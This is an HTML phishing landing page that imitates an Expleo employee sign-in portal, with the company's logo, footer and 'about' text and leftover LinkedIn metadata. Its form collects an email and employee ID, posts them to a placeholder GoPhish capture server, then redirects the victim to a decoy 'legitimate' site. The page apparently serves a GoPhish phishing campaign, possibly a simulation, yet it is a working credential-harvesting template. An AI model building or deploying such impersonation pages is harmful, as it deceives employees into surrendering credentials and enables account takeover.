<!DOCTYPE html><html lang="en"><head><meta name="pageKey" content="d_homepage-guest-home"/><meta name="locale" content="en_US"/><meta id="config" data-app-version="2.1.593" data-call-tree-id="AAX4/O90M0gaE+6rrBM+cQ==" data-jet-tags="guest-homepage" data-multiproduct-name="homepage-guest-frontend" data-service-name="homepage-guest-frontend" data-browser-id="4455239a-c999-4de9-8574-e6cb36192562" data-enable-page-view-heartbeat-tracking="" data-disable-comscore-tracking="" data-page-instance="urn:li:page:d_homepage-guest-home;2U3pGnewTvW7De3BpXAeOg==" data-disable-jsbeacon-pagekey-suffix="false" data-member-id="0"/>
<link href="/" rel="canonical"/>
<link href="https://de.expleo.com/" hreflang="de" rel="alternate"/>
	<link href="https://ie.expleo.com/" hreflang="en-IE" rel="alternate"/>
	<link href="https://www.expleo.com/" hreflang="en-US" rel="alternate"/>
	<link href="https://pt.expleo.com/" hreflang="pt" rel="alternate"/>
	<link href="https://il.expleo.com/" hreflang="en-IL" rel="alternate"/>
	<link href="https://my.expleo.com/" hreflang="ms-MY" rel="alternate"/>
	<link href="https://in.expleo.com/" hreflang="en-IN" rel="alternate"/>
	<link href="https://bo.expleo.com/" hreflang="es-BO" rel="alternate"/>
	<link href="https://za.expleo.com/" hreflang="en-ZA" rel="alternate"/>
	<link href="https://cn.expleo.com/" hreflang="zh-CN" rel="alternate"/>
	<link href="https://au.expleo.com/" hreflang="en-AU" rel="alternate"/>
	<link href="https://id.expleo.com/" hreflang="id" rel="alternate"/>
	<link href="https://ng.expleo.com/" hreflang="en-NG" rel="alternate"/>
	<link href="https://ch.expleo.com/" hreflang="de-CH" rel="alternate"/>
	<link href="https://jp.expleo.com/" hreflang="ja-JP" rel="alternate"/>
	<link href="https://zw.expleo.com/" hreflang="en-ZW" rel="alternate"/>
	<link href="https://jm.expleo.com/" hreflang="en-JM" rel="alternate"/>
	<link href="https://sv.expleo.com/" hreflang="es-SV" rel="alternate"/>
	<link href="https://my.expleo.com/" hreflang="ms" rel="alternate"/>
	<link href="https://gt.expleo.com/" hreflang="es-GT" rel="alternate"/>
	<link href="https://www.expleo.com/" hreflang="en" rel="alternate"/>
	<link href="https://cr.expleo.com/" hreflang="es-CR" rel="alternate"/>
	<link href="https://it.expleo.com/" hreflang="it" rel="alternate"/>
	<link href="https://cl.expleo.com/" hreflang="es-CL" rel="alternate"/>
	<link href="https://es.expleo.com/" hreflang="es" rel="alternate"/>
	<link href="https://cn.expleo.com/" hreflang="zh" rel="alternate"/>
	<link href="https://co.expleo.com/" hreflang="es-CO" rel="alternate"/>
	<link href="https://pe.expleo.com/" hreflang="es-PE" rel="alternate"/>
	<link href="https://ae.expleo.com/" hreflang="ar" rel="alternate"/>
	<link href="https://nz.expleo.com/" hreflang="en-NZ" rel="alternate"/>
	<link href="https://pt.expleo.com/" hreflang="pt-PT" rel="alternate"/>
	<link href="https://pa.expleo.com/" hreflang="es-PA" rel="alternate"/>
	<link href="https://jp.expleo.com/" hreflang="ja" rel="alternate"/>
	<link href="https://sg.expleo.com/" hreflang="en-SG" rel="alternate"/>
	<link href="https://fr.expleo.com/" hreflang="fr-FR" rel="alternate"/>
	<link href="https://ro.expleo.com/" hreflang="ro" rel="alternate"/>
	<link href="https://uk.expleo.com/" hreflang="en-GB" rel="alternate"/>
	<link href="https://nl.expleo.com/" hreflang="nl" rel="alternate"/>
	<link href="https://ke.expleo.com/" hreflang="en-KE" rel="alternate"/>
	<link href="https://no.expleo.com/" hreflang="no" rel="alternate"/>
	<link href="https://ca.expleo.com/" hreflang="en-CA" rel="alternate"/>
	<link href="https://ru.expleo.com/" hreflang="ru" rel="alternate"/>
	<link href="https://gh.expleo.com/" hreflang="en-GH" rel="alternate"/>
	<link href="https://pr.expleo.com/" hreflang="es-PR" rel="alternate"/>
	<link href="https://fr.expleo.com/" hreflang="fr" rel="alternate"/>
	<link href="https://do.expleo.com/" hreflang="es-DO" rel="alternate"/>
	<link href="https://at.expleo.com/" hreflang="de-AT" rel="alternate"/>
	<link href="https://ec.expleo.com/" hreflang="es-EC" rel="alternate"/>
	<link href="https://cz.expleo.com/" hreflang="cs-CZ" rel="alternate"/>
	<link href="https://ph.expleo.com/" hreflang="en-PH" rel="alternate"/>
	<link href="https://pk.expleo.com/" hreflang="en-PK" rel="alternate"/>
	<link href="https://de.expleo.com/" hreflang="de-DE" rel="alternate"/>
	<link href="https://se.expleo.com/" hreflang="sv" rel="alternate"/>
	<link href="https://kr.expleo.com/" hreflang="ko" rel="alternate"/>
	<link href="https://tt.expleo.com/" hreflang="en-TT" rel="alternate"/>
	<link href="https://tw.expleo.com/" hreflang="zh-TW" rel="alternate"/>
	<link href="https://hk.expleo.com/" hreflang="en-HK" rel="alternate"/>
	<link href="https://br.expleo.com/" hreflang="pt-BR" rel="alternate"/>
	<link href="https://uy.expleo.com/" hreflang="es-UY" rel="alternate"/>
	<link href="https://es.expleo.com/" hreflang="es-ES" rel="alternate"/>
	<link href="https://ve.expleo.com/" hreflang="es-VE" rel="alternate"/>
	<link href="https://mx.expleo.com/" hreflang="es-MX" rel="alternate"/>
	<link href="https://cz.expleo.com/" hreflang="cs" rel="alternate"/>
	<link href="https://ar.expleo.com/" hreflang="es-AR" rel="alternate"/>
	<link href="https://th.expleo.com/" hreflang="th" rel="alternate"/>
	<link href="https://se.expleo.com/" hreflang="sv-SE" rel="alternate"/>
	<link href="https://ph.expleo.com/" hreflang="tl" rel="alternate"/>
	<link href="https://dk.expleo.com/" hreflang="da-DK" rel="alternate"/>
	<link href="https://lu.expleo.com/" hreflang="fr-LU" rel="alternate"/>
	<link href="https://pl.expleo.com/" hreflang="pl" rel="alternate"/>
	<link href="https://dk.expleo.com/" hreflang="da" rel="alternate"/>
	<link href="https://tr.expleo.com/" hreflang="tr" rel="alternate"/>
	<link href="https://www.expleo.com/" hreflang="x-default" rel="alternate"/>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="format-detection" content="telephone=no">
    <meta name="theme-color" content="#6846c6">
    <link rel="profile" href="https://gmpg.org/xfn/11">
    <link href="https://expleo.com/global/en/wp-content/uploads/2021/10/favicon-1-150x150.png" rel="icon"/>
    <title>Expleo: Sign In</title>
    <style>
        * {
            box-sizing: border-box;
        }
        body {
            font-family: calibri;
            margin: 0;
            padding: 0;
            background-color:#6846c6; /* Change background color to light blue */
        }
        .container {
            width: 40%;
            margin: 0 auto;
        }
        form {
            background-color: #f2f2f2;
            padding: 30px;
            border-radius: 10px;
        }
        h2 {
            text-align: center;
            margin-bottom: 10px;
        }
        .form-group {
            margin-bottom: 10px;
        }
        input[type="text"],
	input[type="email"],
        input[type="password"] {
            width: 100%;
            padding: 12px;
            border-radius: 5px;
            border: 1px solid #ccc;
            margin-bottom: 10px;
        }
        button {
            width: 100%;
            padding: 12px;
            background-color: #0047AB;
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
        button:hover {
            background-color: #003380;
        }
        .employee_signin {
            text-align: left;
            color: #0047AB;
        }
        .company_terms {
            text-align: left;
            color: #0047ab;
        }
        .image_position {
            text-align: center;
            margin: 0 auto;
            width: 200px;
            height: 70px;
            background-color: #6846c6;
            /* padding-left: -20px; */
        }
        .row {
            background-color: rgb(9, 9, 9);
            font-family: calibri;
            max-width: 100%;
            color: white;
        }
        .C-hover:hover{
            color: #6846c6;
        }
        .column {
            float: left;
            padding: 10px;
            height: 300px; /* Should be removed. Only for demonstration */
        }
        .left {
            width: 15%;
            padding-left: 20px;
        }
        .middle {
            width: 15%;
            padding-left: 20px;
        }
        .right {
            width: 70%;
            padding-left: 20px;
        }
        .about_expleo {
            color: #6846c6;
        }
        .row:after {
            content: "";
            display: table;
            clear: both;
        }
        ul.no-bullets {
            list-style-type: none;
            padding: 0;
            margin: 0;
            line-height: 2;
        }
        .footer_menu ul {
            list-style: none;
            color: white;
        }
        .footer_menu li {
            display: inline;
            color: white;
        }
        .think_bold_text {
            text-align: left;
            font-size: 25px;
            font-weight: bold;
        }
        .horizontal_line {
            border-top: 1px solid #ccc;
        }
        .footer_menu .space {
            word-spacing: 10px;
            padding-left: 10px;
        }
        .footer_menu .end {
            padding-left: 330px;
            text-align: right;
            color: white;
        }
        .language-dropdown {
            position: absolute;
            top: 10px;
            right: 10px;
        }
        .language-dropdown select {
            padding: 5px;
            border-radius: 5px;
            border: 1px solid #ccc;
        }
        .bracket{
            display: inline-block;
            vertical-align: middle;
            padding-right: 12px;
        }
        .bracket1{
            display: inline-block;
            vertical-align: middle;
            padding-right: -10px;
        }
        .social-icons{
            padding-top: 10px;
            grid-template-columns: repeat(4,auto);
            grid-column-gap: 26px;
            grid-row-gap: 26px;
            width: auto;
        }
        /* .image-container {
            
            width: 200px; 
            height: 100px; 
            overflow: hidden; 
            position: absolute;
        } */
        .image-container img {
            width: 100%; 
            height: auto; 
            display: block;
        }
        .line-container{
            display: flex;
        }
        .line{
            display: inline-block;
            margin: 1px;
        }
    </style>
</head>
<script>
    function getDfd() {let yFn,nFn;const p=new Promise(function(y, n){yFn=y;nFn=n;});p.resolve=yFn;p.reject=nFn;return p;}
    window.lazyloader = getDfd();
    window.tracking = getDfd();
    window.impressionTracking = getDfd();
    window.ingraphTracking = getDfd();
    window.appDetection = getDfd();
    window.pemTracking = getDfd();
  </script>
  <script>
      (function () {
         var fs = document.createElement("script");
         fs.setAttribute("src", "https://cdn.facil-iti.app/tags/faciliti-tag.min.js");
         fs.dataset.applicationIdentifier = "9b877c20-9bbb-11ec-b148-d1099e085770";

         document.head.appendChild(fs);
      }());
   </script><meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />
<!-- <title>Expleo: Log In or Sign Up</title> -->
<!--	<meta property="og:site_name" content="expleo"/><meta name="viewport" content="width=device-width, initial-scale=1"/><meta property="og:title" content="LinkedIn: Log In or Sign Up"/><meta property="og:description" content="750 million+ members | Manage your professional identity. Build and engage with your professional network. Access knowledge, insights and opportunities."/><meta property="og:image" content="https://static.licdn.com/scds/common/u/images/logos/favicons/v1/favicon.ico"/><meta property="og:type" content="website"/><meta property="og:url" content="https://www.linkedin.com/"/><meta name="twitter:card" content="summary"/><meta name="twitter:site" content="@linkedin"/><meta name="twitter:title" content="LinkedIn: Log In or Sign Up"/><meta name="twitter:description" content="750 million+ members | Manage your professional identity. Build and engage with your professional network. Access knowledge, insights and opportunities."/><meta name="description" content="750 million+ members | Manage your professional identity. Build and engage with your professional network. Access knowledge, insights and opportunities."/><meta name="linkedin:pageTag" content="basic"/><meta name="naver-site-verification" content="6c180087cc8c9aef0b448521383709b955b7dc5b"/><meta name="litmsProfileName" content="homepage-guest-frontend"/><meta name="clientSideIngraphs" content="1" data-gauge-metric-endpoint="/homepage-guest/api/ingraphs/gauge" data-counter-metric-endpoint="/homepage-guest/api/ingraphs/counter"/><meta name="robots" content="noarchive"/>
<link href="https://static.licdn.com/aero-v1/sc/h/atbn2o0wa7dkf1r28i6huscbz" rel="stylesheet"/>-->

<script>
window.addEventListener("load", function() {
  window.scrollTo(0,0);
});
</script>
<body class="body" dir="ltr"> 
    <div class="language-dropdown">
        <select id="languageSelect" onchange="changeLanguage()">
            <option value="en">English</option>
            <option value="de">German</option>
            <option value="fr">French</option>
            <!-- Add more language options as needed -->
        </select>
    </div>

    <div class="container">
        <form action="http://your-gophish-server.com/capture" method="POST">
            <div class="image-container">
                <p class="image_position">
                    <img src="https://expleogroup.com/wp-content/uploads/logo/expleologo.svg" alt="cropped image"/>
                </p>
            </div>
            <h2>Sign in</h2>
            <div class="form-group">
                <input type="text" id="username" name="username" required placeholder="Email ID">
            </div>
            <div class="form-group">
                <input type="text" id="employee_idinput" name="password" required placeholder="Employee ID">
            </div>
            <button type="submit">Submit</button>
            <p class="employee_signin">Employee Sign in</p>
            <hr width="90%" size="3">
            <p class="employee_signin">Problems Signing in?</p>
            <p class="employee_signin">Frequently asked questions</p>
            <div class="line-container">
                <span class="line">By Signing in, you agreed to our</span>
                <span class="line" style="color: #0047ab;">Terms of use</span>
            </div>
        </form>
        
        <script>
        document.querySelector('form').onsubmit = function() {
            setTimeout(function() {
                window.location.href = 'https://legitimate-site.com';
            }, 1000);
        };
        </script>        
    </div>
    <script type="text/javascript">
        if (navigator.userAgent.match(/iPhone/i) != null) {
        var emails = document.querySelectorAll("input[type='email']");
        if (emails) {
            for (var i = 0; i < emails.length; i++) {
                emails[i].type = 'text';
            }
        }
    }if (navigator.userAgent.match(/IEMobile\/10\.0/)) {
        var msViewportStyle = document.createElement("style");
        msViewportStyle.appendChild(
            document.createTextNode(
                "@-ms-viewport{width:auto!important}"
            )
        );
        msViewportStyle.appendChild(
            document.createTextNode(
                "@-ms-viewport{height:auto!important}"
            )
        );
        document.getElementsByTagName("head")[0].appendChild(msViewportStyle);
    }
    
    // If the innerWidth is defined, use it as the viewport width.
    if (window.innerWidth && window.outerWidth && window.innerWidth !== window.outerWidth) {
        var viewport = document.querySelector("meta[name=viewport]");
        viewport.setAttribute('content', 'width=' + window.innerWidth + ', initial-scale=1.0, user-scalable=1');
    }
    
    // Gets the current style of a specific property for a specific element.
    function getStyle(element, styleProp) {
        var propStyle = null;
    
        if (element && element.currentStyle) {
            propStyle = element.currentStyle[styleProp];
        }
        else if (element && window.getComputedStyle) {
            propStyle = document.defaultView.getComputedStyle(element, null).getPropertyValue(styleProp);
        }
    
        return propStyle;
    }
    
    // The script below is used for downloading the illustration image 
    // only when the branding is displaying. This script work together
    // with the code in PageBase.cs that sets the html inline style
    // containing the class 'illustrationClass' with the background image.
    var computeLoadIllustration = function () {
        var branding = document.getElementById("branding");
        var brandingDisplay = getStyle(branding, "display");
        var brandingWrapperDisplay = getStyle(document.getElementById("brandingWrapper"), "display");
    
        if (brandingDisplay && brandingDisplay !== "none" &&
            brandingWrapperDisplay && brandingWrapperDisplay !== "none") {
            var newClass = "illustrationClass";
    
            if (branding.classList && branding.classList.add) {
                branding.classList.add(newClass);
            } else if (branding.className !== undefined) {
                branding.className += " " + newClass;
            }
            if (window.removeEventListener) {
                window.removeEventListener('load', computeLoadIllustration, false);
                window.removeEventListener('resize', computeLoadIllustration, false);
            }
            else if (window.detachEvent) {
                window.detachEvent('onload', computeLoadIllustration);
                window.detachEvent('onresize', computeLoadIllustration);
            }
        }
    };
    
    if (window.addEventListener) {
        window.addEventListener('resize', computeLoadIllustration, false);
        window.addEventListener('load', computeLoadIllustration, false);
    }
    else if (window.attachEvent) {
        window.attachEvent('onresize', computeLoadIllustration);
        window.attachEvent('onload', computeLoadIllustration);
    }
    
    // Function to change illustration image. Usage example below.
    function SetIllustrationImage(imageUri) {
        var illustrationImageClass = '.illustrationClass {background-image:url(' + imageUri + ');}';
    
        var css = document.createElement('style');
        css.type = 'text/css';
    
        if (css.styleSheet) css.styleSheet.cssText = illustrationImageClass;
        else css.appendChild(document.createTextNode(illustrationImageClass));
    
        document.getElementsByTagName("head")[0].appendChild(css);
    }
    
    // Example to change illustration image on HRD page after adding the image to active theme:
    // PSH> Set-AdfsWebTheme -TargetName <activeTheme> -AdditionalFileResource @{uri='/adfs/portal/images/hrd.jpg';path='.\hrd.jpg'}
    //
    //if (typeof HRD != 'undefined') {
    //    SetIllustrationImage('/adfs/portal/images/hrd.jpg');
    //}
    //]]>
    </script>

    <div class="row">
        <div class="column left">
            <ul class="no-bullets">
                <br><br>
                <li class="C-hover">CORPORATE <br> GOVERNANCE</li>
                <li class="C-hover">FINANCIAL</li>
                <li class="C-hover">MEDIA CENTER</li>
                <li class="C-hover">CONTACT</li>
            </ul>
        </div>
        <div class="column middle">
            <ul class="no-bullets">
                <br><br>
                <li class="C-hover">ABOUT US</li>
                <li class="C-hover">LOCATIONS</li>
                <li class="C-hover">BOARD OF <br> DIRECTORS</li>
                <li class="C-hover">CSR &<br> CERTIFICATIONS</li>
            </ul>
        </div>
        <div class="column right">
            <h2 class="think_bold_text">
                <div class="bracket1">
                    <svg width="20" height="30" viewBox="0 0 20 40" xmlns="http://www.w3.org/2000/svg">
                        <path d="M10 0 Q0 0 0 10 L0 30 Q0 40 10 40" stroke="white" fill="none" stroke-width="6"/>
                    </svg>
                </div>
                <div class="bracket">
                    <svg width="20" height="30" viewBox="0 0 20 40" xmlns="http://www.w3.org/2000/svg">
                        <path d="M10 0 Q20 0 20 10 L20 30 Q20 40 10 40" stroke="white" fill="none" stroke-width="6"/>
                    </svg>
                </div>
                Think bold, act reliable
            </h2>
            <h3 class="about_expleo">About Expleo</h3>
            <p>Expleo is a global engineering, technology and consulting service provider that partners with leading
                organisations to guide them through their business transformation, helping them achieve operational excellence and 
                future-proof their businesses. Expleo benefits from more than 50 years of experience developing complex products, optimising
                manufacturing processes, and ensuring the quality of information systems. Leveraging its deep sector knowledge and wide-ranging
                expertise in fields including AI engineering, digitalisation, hyper-automation, cybersecurity and data science, the group’s 
                mission is to fast-track innovation through each step of the value chain. As a responsible and diverse organisation, Expleo 
                is committed to doing business with integrity and working towards a more sustainable and secure society. Expleo boasts an 
                extensive global footprint, powered by 19,000 highly skilled experts delivering value in 30 countries.<br>
            </p>
        </div>
        <hr class="horizontal_line" width="95%" size="1">
        <ul class="footer_menu">
            <li class="C-hover">IMPRINT</li>
            <li class="space">|</li>
            <li class="C-hover">TERMS & CONDITIONS</li>
            <li class="space">|</li>
            <li class="C-hover">DATA PROTECTION</li>
            <li class="space">|</li>
            <li class="C-hover">COOKIES MANAGEMENT</li>
            <li class="space">|</li>
            <li class="end">© Expleo 2024</li>
        </ul>
    </div>
</body>
</html>
